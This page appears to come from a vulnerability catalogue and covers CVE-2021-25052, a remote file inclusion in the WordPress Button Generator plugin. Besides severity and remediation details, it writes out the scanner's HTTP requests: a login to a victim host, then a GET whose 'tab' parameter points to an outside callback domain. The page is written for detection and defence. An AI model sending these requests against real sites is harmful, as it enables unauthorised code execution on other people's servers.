🔙 목록으로 돌아가기

CVE-2021-25052: WordPress Button Generator <2.3.3 - Remote File Inclusion

TitleWordPress Button Generator <2.3.3 - Remote File Inclusion
Authorcckuailong
SeverityHigh
ImpactAn attacker can exploit this vulnerability to execute arbitrary code on the target system.
RemediationUpdate to the latest version of the WordPress Button Generator plugin (2.3.3) to fix the remote file inclusion vulnerability.
CVSS Score8.8
EPSS Score0.42408
CVE IDCVE-2021-25052
CWE IDCWE-352
Tags cve2021 cve wp-plugin authenticated wpscan rfi wp wordpress wow-company vuln

🔍 Vulnerability Description

WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Connection: close
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Origin: /
Accept-Encoding: gzip

log=Y2ruRF&pwd=YnHDth&wp-submit=Log+In&testcookie=1
GET /wp-admin/admin.php?page=wow-company&tab=http://d5jnh0hle0o4iu3nue4gewzhksstrm4sr.oast.fun/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-25052.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-25052.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A